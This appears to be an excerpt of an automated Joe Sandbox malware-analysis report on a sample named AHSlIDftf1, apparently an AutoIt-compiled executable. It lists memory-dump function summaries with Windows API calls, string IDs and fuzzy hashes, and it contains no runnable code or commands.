                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 952045576-0
                                                                                                            • Opcode ID: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
                                                                                                            • Instruction ID: 11a762f2c27edc6902b4d75f290bdf52484a0bf4528e98dcd565c5d4fd5967b8
                                                                                                            • Opcode Fuzzy Hash: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
                                                                                                            • Instruction Fuzzy Hash: CF41A265D10218B6CB11EBF4888A9CFB7B8EF45310F508566F519E3122FB34E245C7BA
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00D6F953
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF3D1
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF454
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268545403-0
                                                                                                            • Opcode ID: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
                                                                                                            • Instruction ID: 3465206ee7d0f75dbe590554edc7187c13b3d6048e88a4aecf3121e015c8622c
                                                                                                            • Opcode Fuzzy Hash: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
                                                                                                            • Instruction Fuzzy Hash: A8412D31508B80BFD7399B69E8C872E7B91AB56314F1C447EE0D756660C671D881CF31
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE2D1B
                                                                                                            • GetDC.USER32(00000000), ref: 00DE2D23
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DE2D2E
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00DE2D3A
                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DE2D76
                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DE2D87
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DE5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00DE2DC2
                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DE2DE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864802216-0
                                                                                                            • Opcode ID: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
                                                                                                            • Instruction ID: bb5bb7cbc37cce5ccd7f632dc83455478e84f13ae689659356404fe670e4f2e3
                                                                                                            • Opcode Fuzzy Hash: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
                                                                                                            • Instruction Fuzzy Hash: B8318B72211294BBEB119F558C8AFFB3BADEB49721F084055FE08DE2A1C6759C41CBB0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
                                                                                                            • Instruction ID: a6e8862966b6be1c94d7b41e3daa03ace776525387003e79edb2aa5447abfb37
                                                                                                            • Opcode Fuzzy Hash: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
                                                                                                            • Instruction Fuzzy Hash: F5210B75740A09FBE2146625AD82FFF335CEF20788F684124FD0A9A585FB20EE1582B5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                            • API String ID: 0-572801152
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00D915CE
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D91651
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D916E4
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D916FB
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D91777
                                                                                                            • __freea.LIBCMT ref: 00D917A2
                                                                                                            • __freea.LIBCMT ref: 00D917AE
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829977744-0
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit
                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                            • API String ID: 2610073882-625585964
                                                                                                            APIs
                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DC125C
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DC1284
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DC12A8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC12D8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC135F
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC13C4
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC1430
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550207440-0
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD396B
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00DD3A7A
                                                                                                            • _wcslen.LIBCMT ref: 00DD3A8A
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3C1F
                                                                                                              • Part of subcall function 00DC0CDF: VariantInit.OLEAUT32(00000000), ref: 00DC0D1F
                                                                                                              • Part of subcall function 00DC0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DC0D28
                                                                                                              • Part of subcall function 00DC0CDF: VariantClear.OLEAUT32(?), ref: 00DC0D34
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
                                                                                                              • Part of subcall function 00DB000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
                                                                                                              • Part of subcall function 00DB000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
                                                                                                              • Part of subcall function 00DB000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DD4C51
                                                                                                            • _wcslen.LIBCMT ref: 00DD4D59
                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DD4DCF
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00DD4DDA
                                                                                                            Similarity
                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                            • String ID: NULL Pointer assignment
                                                                                                            • API String ID: 614568839-2785691316
                                                                                                            APIs
                                                                                                            • GetMenu.USER32(?), ref: 00DE2183
                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00DE21B5
                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DE21DD
                                                                                                            • _wcslen.LIBCMT ref: 00DE2213
                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00DE224D
                                                                                                            • GetSubMenu.USER32(?,?), ref: 00DE225B
                                                                                                              • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
                                                                                                              • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
                                                                                                              • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DE22E3
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4196846111-0
APIs
• IsWindow.USER32(013E5770), ref: 00DE7F37
• IsWindowEnabled.USER32(013E5770), ref: 00DE7F43
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DE801E
• SendMessageW.USER32(013E5770,000000B0,?,?), ref: 00DE8051
• IsDlgButtonChecked.USER32(?,?), ref: 00DE8089
• GetWindowLongW.USER32(013E5770,000000EC), ref: 00DE80AB
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DE80C3
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
APIs
• GetParent.USER32(?), ref: 00DBAEF9
• GetKeyboardState.USER32(?), ref: 00DBAF0E
• SetKeyboardState.USER32(?), ref: 00DBAF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00DBAF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00DBAFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00DBAFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DBB020
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 00DBAD19
• GetKeyboardState.USER32(?), ref: 00DBAD2E
• SetKeyboardState.USER32(?), ref: 00DBAD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DBADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DBADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DBAE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DBAE38
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetConsoleCP.KERNEL32(00D93CD6,?,?,?,?,?,?,?,?,00D85BA3,?,?,00D93CD6,?,?), ref: 00D85470
• __fassign.LIBCMT ref: 00D854EB
• __fassign.LIBCMT ref: 00D85506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00D93CD6,00000005,00000000,00000000), ref: 00D8552C
• WriteFile.KERNEL32(?,00D93CD6,00000000,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D8554B
• WriteFile.KERNEL32(?,?,00000001,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D85584
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00D72D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 00D72D53
• _ValidateLocalCookies.LIBCMT ref: 00D72DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 00D72E0C
• _ValidateLocalCookies.LIBCMT ref: 00D72E61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
  • Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DD1112
• WSAGetLastError.WSOCK32 ref: 00DD1121
• WSAGetLastError.WSOCK32 ref: 00DD11C9
• closesocket.WSOCK32(00000000), ref: 00DD11F9
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
APIs
  • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD
  • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16
• lstrcmpiW.KERNEL32(?,?), ref: 00DBCF45
• MoveFileW.KERNEL32(?,?), ref: 00DBCF7F
• _wcslen.LIBCMT ref: 00DBD005
• _wcslen.LIBCMT ref: 00DBD01B
• SHFileOperationW.SHELL32(?), ref: 00DBD061
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DE2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DE2EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DE2EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DE2F0B
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178440468-0
                                                                                                            • Opcode ID: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
                                                                                                            • Instruction ID: a8b386ffd5cf873e77fa708d3c0d90e1582e2896bd57cfb5359228b2d42e4f12
                                                                                                            • Opcode Fuzzy Hash: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
                                                                                                            • Instruction Fuzzy Hash: 9C3116306042A09FDB21AF1ADC85F6637E8EB9AB10F1801A4F904DF2B1CB71AC459B61
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB778F
• SysAllocString.OLEAUT32(00000000), ref: 00DB7792
• SysAllocString.OLEAUT32(?), ref: 00DB77B0
• SysFreeString.OLEAUT32(?), ref: 00DB77B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 00DB77DE
• SysAllocString.OLEAUT32(?), ref: 00DB77EC
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7868
• SysAllocString.OLEAUT32(00000000), ref: 00DB786B
• SysAllocString.OLEAUT32 ref: 00DB788C
• SysFreeString.OLEAUT32 ref: 00DB7895
• StringFromGUID2.OLE32(?,?,00000028), ref: 00DB78AF
• SysAllocString.OLEAUT32(?), ref: 00DB78BD
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00DC04F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC052E
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC0601
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
  • Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
  • Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DE4112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DE411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DE412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DE4139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DE4145
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
  • Part of subcall function 00D8D7A3: _free.LIBCMT ref: 00D8D7CC
• _free.LIBCMT ref: 00D8D82D
  • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
  • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
• _free.LIBCMT ref: 00D8D838
• _free.LIBCMT ref: 00D8D843
• _free.LIBCMT ref: 00D8D897
• _free.LIBCMT ref: 00D8D8A2
• _free.LIBCMT ref: 00D8D8AD
• _free.LIBCMT ref: 00D8D8B8
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DBDA74
• LoadStringW.USER32(00000000), ref: 00DBDA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DBDA91
• LoadStringW.USER32(00000000), ref: 00DBDA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DBDADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00DBDAB9
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(013DE0A8,013DE0A8), ref: 00DC097B
                                                                                                            • EnterCriticalSection.KERNEL32(013DE088,00000000), ref: 00DC098D
                                                                                                            • TerminateThread.KERNEL32(013DE0A0,000001F6), ref: 00DC099B
                                                                                                            • WaitForSingleObject.KERNEL32(013DE0A0,000003E8), ref: 00DC09A9
                                                                                                            • CloseHandle.KERNEL32(013DE0A0), ref: 00DC09B8
                                                                                                            • InterlockedExchange.KERNEL32(013DE0A8,000001F6), ref: 00DC09C8
                                                                                                            • LeaveCriticalSection.KERNEL32(013DE088), ref: 00DC09CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3495660284-0
                                                                                                            • Opcode ID: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
                                                                                                            • Instruction ID: 757e0f0dbd6953e158bb64eac5eb59a6ad6c3997da4e3c117f2fa5cbf18663e0
                                                                                                            • Opcode Fuzzy Hash: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
                                                                                                            • Instruction Fuzzy Hash: 45F01D31552742EBD7416B94EEC8BD67A29BF01702F842015F201999A0CB749466CFB4
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 00D55D30
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D55D71
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00D55D99
                                                                                                            • GetClientRect.USER32(?,?), ref: 00D55ED7
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D55EF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1296646539-0
                                                                                                            • Opcode ID: a29307ae61e982d5595f9c6d85ee5dc73b9f5e9f19d86c764442b6bc1fc7d789
                                                                                                            • Instruction ID: e83e437a9592c1883fe07582d01cd12e2b15ba033a18c60b4f80d9ea66ed54bd
                                                                                                            • Opcode Fuzzy Hash: a29307ae61e982d5595f9c6d85ee5dc73b9f5e9f19d86c764442b6bc1fc7d789
                                                                                                            • Instruction Fuzzy Hash: D8B16A35A0074ADBDF10CFA8C491AEAB7F1BF48311F14851AECA9D7254DB30EA55DB60
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00D800BA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D800D6
                                                                                                            • __allrem.LIBCMT ref: 00D800ED
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D8010B
                                                                                                            • __allrem.LIBCMT ref: 00D80122
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D80140
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction ID: 1d55790ed87d7fc4268450c26ff2f752939ca319dd14f20b3e176d85012dd1f6
                                                                                                            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction Fuzzy Hash: 5881E6766007069FE720AF68CC41B6AB7E9EF41734F28853AF555D6281EB70D9048BB0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00DD101C,00000000,?,?,00000000), ref: 00DD3195
                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DD1DC0
